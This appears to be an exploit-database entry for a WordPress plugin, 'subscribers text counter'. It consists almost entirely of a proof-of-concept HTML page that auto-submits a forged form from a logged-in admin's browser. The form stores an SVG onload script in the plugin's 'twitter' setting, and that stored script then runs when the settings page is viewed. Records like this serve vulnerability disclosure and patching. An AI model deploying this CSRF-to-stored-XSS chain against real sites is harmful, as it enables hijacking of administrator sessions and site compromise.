Share
## https://sploitus.com/exploit?id=WPEX-ID:93FAAD5B-E1E8-4E49-B19E-B91343D68B51
Create an HTML file with the following content and have a logged in admin access it:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=subscribers_text_counter" method="POST">
        <input type="text" name="twitter" value='"><svg/onload=alert(2);>'>
        <input type="text" name="stextcount_hidden" value="settings">
        <input type="submit" value="submit">
    </form>
</body>
```

Navigate to the plugin's settings to trigger the XSS.